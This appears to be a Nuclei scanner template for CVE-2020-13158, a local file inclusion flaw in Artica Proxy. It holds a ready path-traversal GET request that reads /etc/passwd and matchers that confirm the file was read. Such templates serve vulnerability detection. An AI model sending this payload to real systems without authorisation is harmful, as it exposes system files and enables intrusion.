37 lines
1.0 KiB
YAML
37 lines
1.0 KiB
YAML
id: CVE-2020-13158
|
|
|
|
info:
|
|
name: Artica Proxy Community Edition <4.30.000000 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: Artica Proxy Community Edition before 4.30.000000 is vulnerable to local file inclusion via the fw.progrss.details.php popup parameter.
|
|
reference:
|
|
- https://github.com/InfoSec4Fun/CVE-2020-13158
|
|
- https://sourceforge.net/projects/artica-squid/files/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-13158
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2020-13158
|
|
cwe-id: CWE-22
|
|
cpe: cpe:2.3:a:articatech:artica_proxy:*:*:*:*:*:*:*:*
|
|
epss-score: 0.96915
|
|
tags: cve,cve2020,artica,lfi
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|